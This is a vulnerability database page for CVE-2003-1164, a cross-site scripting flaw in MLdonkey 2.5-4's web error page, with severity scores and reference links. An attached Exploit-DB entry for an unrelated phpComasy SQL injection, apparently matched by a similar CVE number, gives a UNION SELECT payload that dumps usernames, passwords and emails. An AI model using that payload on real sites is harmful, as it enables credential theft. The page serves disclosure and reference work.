CVE-2003-1164
Published 2003-12-31
Priority: P4 17 | medium | 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.79% (75.7th percentile)
Cross-site scripting (XSS) vulnerability in Mldonkey 2.5-4 allows remote attackers to inject arbitrary web script or HTML via the URI, which is injected into the HTML error page.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mldonkey | mldonkey | — | — |
No detection rules found.
Exploit-DB
phpComasy 0.8 - 'mod_project_id' SQL Injection
exploitdb·2008-03-01
CVE-2008-1164 phpComasy 0.8 - 'mod_project_id' SQL Injection
---
By Cr@zy_King / [email protected]
phpComasy 0.8 (mod_project_id) Remote Sql Inj. Vuln
Script Down : http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9
Page : index.php?id=7&mod_action=project_detail&mod_project_id=Sql.
Exp : -9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user
Note : Nobody should think themselves expensive, I know everyone's discount day ;)
Hackshow.us / Hack is a show.
Greatz : Eno7 - Crackers_Child - Thehacker - Ghost61 - Tilkiandre - Edoras - The_Bekir - DreamTurk
Special Greatz : str0ke and SuSkun (since 2003 :) Welcome, brother Suskun.
# milw0rm.com [2008-03-01]
Exploit-DB
MLdonkey 2.5-4 - Cross-Site Scripting
exploitdb·2003-10-31
CVE-2003-1164 MLdonkey 2.5-4 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/8946/info
It has been reported that the Mldonkey web interface is prone to cross-site scripting attacks when reporting errors. The problem occurs due to insufficient sanitization of script code within requests. This could potentially allow an attacker to carry out a variety of attacks on a user.
http://127.0.0.1:4080/...
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/013070.html
http://secunia.com/advisories/10134
http://www.securityfocus.com/bid/8946
https://exchange.xforce.ibmcloud.com/vulnerabilities/13615